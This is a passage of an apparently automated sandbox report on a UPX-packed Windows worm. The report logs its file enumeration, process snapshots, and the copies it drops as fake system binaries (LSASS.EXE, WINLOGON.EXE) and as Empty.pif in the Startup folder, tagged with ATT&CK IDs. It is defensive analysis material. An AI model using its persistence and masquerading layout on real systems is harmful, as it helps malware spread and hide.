\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005240)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"4k51k4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"352\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"392\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"400\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"496\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"504\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"512\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"612\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"688\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"776\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"828\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"864\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"896\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1128\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1280\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1312\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1404\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1504\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1592\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"\\Device\\KsecDD\"\n \"4k51k4.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" has an entrypoint in section \"UPX1\"\n \"services.exe\" has an entrypoint in section \"UPX1\"\n \"shell.exe\" has an entrypoint in section \"UPX1\"\n \"4k51k4.exe\" has an entrypoint in section \"UPX1\"\n \"IExplorer.exe\" has an entrypoint in section \"UPX1\"\n \"CSRSS .exe\" has an entrypoint in section \"UPX1\"\n \"New Folder.exe\" has an entrypoint in section \"UPX1\"\n \"Data HAPUBWS.exe\" has an entrypoint in section \"UPX1\"\n \"Empty.pif\" has an entrypoint in section \"UPX1\"\n \"WINLOGON.EXE.bin\" has an entrypoint in section \"UPX1\"\n \"CSRSS.EXE.bin\" has an entrypoint in section \"UPX1\"\n \"SERVICES.EXE\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C388.bin\" has an entrypoint in section \"UPX1\"\n \"SMSS.EXE\" has an entrypoint in section \"UPX1\"\n \"LSASS.EXE\" has an entrypoint in section \"UPX1\"\n \"MrHelloween.scr\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C38B.bin\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9DA9B.bin\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46918 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46869 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46861 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46752 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46850 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46733 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46759 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 47013 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46921 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46776 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46841 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46753 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46698 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46875 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46751 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46791 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46622 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46769 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46927 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46895 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46803 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46788 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46982 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46780 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46765 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46973 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46889 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46836 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46974 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46919 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46887 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46710 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46901 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46728 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 46784 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000b80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46780 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46988 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n 